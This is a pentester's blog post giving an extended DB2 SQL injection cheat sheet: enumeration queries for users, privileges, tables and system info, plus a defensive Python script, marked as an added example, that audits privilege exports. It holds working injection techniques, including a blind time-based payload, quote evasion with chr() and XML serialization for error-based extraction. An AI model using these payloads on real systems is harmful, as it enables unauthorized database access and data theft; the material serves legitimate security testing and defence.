DB2 SQL injection cheat sheet

Note: There is a Spanish version of this post here.

I'm sure we all (pentesters) make extensive use of pentestmonkey's SQL injection cheat sheets. They are touchstones when it comes to SQL injection, and most of the time they save the day. However, the DB2 cheat sheet is one of the least complete on pentestmonkey's website, probably because DB2 is not a very common database engine and is a fairly complex one. I've had the luck (?) of coming across lots of DB2 systems in my last job and also in my current one, so the missing information was extremely annoying.

Below is a table with an updated DB2 SQL injection cheat sheet, using pentestmonkey's as the starting point. Updated, modified or new fields are marked with an asterisk (*). All of these queries have been tested on Win32 + DB2 v10.1.0, although I've also had the chance to test some on z/OS + DB2 v9.x and v8.x, and most of them work fine. Please note that I'm not a DB2 expert, so if you find errors or inaccurate information, or you know other exciting tricks, please feel free to contact me. Finally, I've uploaded some DB2 dumps of default privileges, tables with PUBLIC access, and other interesting stuff.

Version*
    select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
    select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)
    select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
    select service_level,bld_level from sysibmadm.env_inst_info
Comments
    select blah from foo -- comment like this (double dash)
Current User
    select user from sysibm.sysdummy1
    select session_user from sysibm.sysdummy1
    select system_user from sysibm.sysdummy1
List Users*
    DB2 uses OS accounts. Those with DB2 access can be retrieved with:
    select distinct(authid) from sysibmadm.privileges -- priv required
    select grantee from syscat.dbauth -- incomplete results
    select distinct(definer) from syscat.schemata -- more accurate
    select distinct(grantee) from sysibm.systabauth -- same as previous
List Password Hashes
    N/A (OS user accounts)
List Privileges
    select * from syscat.tabauth -- shows privs on tables
    select * from syscat.tabauth where grantee = current user -- shows privs for the current user
List DBA Accounts*
    select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'
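The two entries above (List Privileges and List DBA Accounts) are the ones a defender runs the other way round: export SYSCAT.TABAUTH and look for who holds CONTROL, what PUBLIC can reach, and who can re-grant. The script below is an added example, not code from the original post. It assumes an export whose columns follow the SYSCAT.TABAUTH catalog view (GRANTEE, GRANTEETYPE, TABSCHEMA, TABNAME, CONTROLAUTH, SELECTAUTH and so on, with values N, Y or G, where G means WITH GRANT OPTION); the rows themselves are constructed sample data.

```python
"""Review a SYSCAT.TABAUTH export for risky table privileges.

Added example for the List Privileges / List DBA Accounts entries:
not code from the original post. Column names follow the SYSCAT.TABAUTH
catalog view; the rows below are constructed sample data, not a real dump.
"""
import csv
import io
from collections import defaultdict

# Constructed sample export (roughly what `select * from syscat.tabauth`
# looks like after EXPORT ... OF DEL); not taken from any real system.
SAMPLE_TABAUTH = """\
GRANTOR,GRANTEE,GRANTEETYPE,TABSCHEMA,TABNAME,CONTROLAUTH,ALTERAUTH,DELETEAUTH,INDEXAUTH,INSERTAUTH,REFAUTH,SELECTAUTH,UPDATEAUTH
SYSIBM,DB2INST1,U,APP,CUSTOMERS,Y,G,G,G,G,G,G,G
DB2INST1,WEBAPP,U,APP,CUSTOMERS,N,N,N,N,N,N,Y,N
DB2INST1,PUBLIC,G,APP,CUSTOMERS,N,N,N,N,N,N,Y,N
DB2INST1,REPORTING,U,APP,ORDERS,N,N,N,N,N,N,G,N
SYSIBM,PUBLIC,G,SYSCAT,TABAUTH,N,N,N,N,N,N,Y,N
SYSIBM,PUBLIC,G,SYSIBM,SYSDUMMY1,N,N,N,N,N,N,Y,N
"""

# Default system schemas listed at the end of the cheat sheet.
CATALOG_SCHEMAS = {"SYSIBM", "SYSCAT", "SYSSTAT", "SYSPUBLIC", "SYSIBMADM", "SYSTOOLS"}
PRIV_COLUMNS = ("ALTERAUTH", "DELETEAUTH", "INDEXAUTH", "INSERTAUTH",
                "REFAUTH", "SELECTAUTH", "UPDATEAUTH")


def parse_tabauth(text):
    """Parse a comma-separated SYSCAT.TABAUTH export into a list of dicts."""
    return list(csv.DictReader(io.StringIO(text)))


def control_holders(rows):
    """Grantees holding CONTROL on any table (the 'List DBA Accounts' query)."""
    return sorted({r["GRANTEE"] for r in rows if r["CONTROLAUTH"] == "Y"})


def public_grants(rows, include_catalog=False):
    """(schema, table, privilege) tuples granted to PUBLIC on application tables.

    Catalog schemas are skipped by default because PUBLIC SELECT on the
    catalog views is the DB2 default; pass include_catalog=True to list them.
    """
    found = []
    for r in rows:
        if r["GRANTEE"] != "PUBLIC":
            continue
        if not include_catalog and r["TABSCHEMA"] in CATALOG_SCHEMAS:
            continue
        for col in PRIV_COLUMNS:
            if r[col] in ("Y", "G"):
                found.append((r["TABSCHEMA"], r["TABNAME"], col))
    return found


def grant_option_holders(rows):
    """Map grantee -> privileges held WITH GRANT OPTION ('G'), excluding the
    owner's CONTROL row. An account that can re-grant widens the blast radius
    of any injection that runs under it."""
    out = defaultdict(set)
    for r in rows:
        if r["CONTROLAUTH"] == "Y":
            continue
        for col in PRIV_COLUMNS:
            if r[col] == "G":
                out[r["GRANTEE"]].add((r["TABSCHEMA"], r["TABNAME"], col))
    return {k: sorted(v) for k, v in out.items()}


def review(text=SAMPLE_TABAUTH):
    """Run all three checks over one export and return the findings."""
    rows = parse_tabauth(text)
    return {
        "control": control_holders(rows),
        "public": public_grants(rows),
        "grant_option": grant_option_holders(rows),
    }


if __name__ == "__main__":
    for key, val in review().items():
        print(key, val)
```

In the constructed sample, the web application account (WEBAPP) only has SELECT, which is what you want an injectable application to run as; the findings worth chasing are the PUBLIC SELECT on APP.CUSTOMERS and the REPORTING account that can re-grant its SELECT on APP.ORDERS.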
Current Database
    select current server from sysibm.sysdummy1
List Databases*
    select distinct(table_catalog) from sysibm.tables
List Columns*
    select name, tbname, coltype from sysibm.syscolumns -- also valid in syscat and sysstat
List Tables
    select table_name from sysibm.tables
    select name from sysibm.systables
Find Tables From Column Name
    select tbname from sysibm.syscolumns where name='username'
Select Nth Row*
    select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
Select Nth Char
    select substr('abc',2,1) from sysibm.sysdummy1 -- returns b
Bitwise AND/OR/NOT/XOR*
    select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available: bitandnot, bitor, bitxor, bitnot
ASCII Value -> Char
    select chr(65) from sysibm.sysdummy1 -- returns 'A'
Char -> ASCII Value
    select ascii('A') from sysibm.sysdummy1 -- returns 65
Casting
    select cast('123' as integer) from sysibm.sysdummy1
    select cast(1 as char) from sysibm.sysdummy1
String Concat
    select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns 'abc'
    select 'a' || 'b' from sysibm.sysdummy1 -- returns 'ab'
IF Statement*
    Seems to be allowed only in stored procedures. Use CASE logic instead.
Case Statement*
    select CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END from sysibm.sysdummy1
Avoiding Quotes*
    select chr(65)||chr(68)||chr(82)||chr(73) from sysibm.sysdummy1 -- returns 'ADRI'. Works without select too
Time Delay*
    Heavy queries, for example:
    ' and (select count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 --
    If user starts with ASCII 68 ('D'), the heavy query is executed, delaying the response. However, if user does not start with ASCII 68, the heavy query is not executed and the response comes back faster.
Serialize to XML (for error based)*
    select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string
    select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- same but without repeated elements
    select xml2clob(xmlelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need cast(xml2clob(...) as varchar(500)) to display the result.
Make DNS Requests
    N/A
Command Execution
    Seems to be allowed only from procedures or UDFs.
Local File Access
    I think this is only available through stored procedures or the db2 tool.
Hostname/IP and OS Info*
    select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info -- requires priv
Location of DB Files*
    select * from sysibmadm.reg_variables where reg_var_name='DB2PATH' -- requires priv
System Config*
    select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- requires priv. Retrieves the automatic maintenance settings of the database configuration that are stored in memory, for all database partitions.
    select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- requires priv. Retrieves the values of all database configuration parameters stored on disk, for all database partitions.
Default System Databases*
    What makes sense for DB2 is to know the default system schemas (and maybe tables):
    SYSIBM / SYSCAT / SYSSTAT / SYSPUBLIC / SYSIBMADM / SYSTOOLS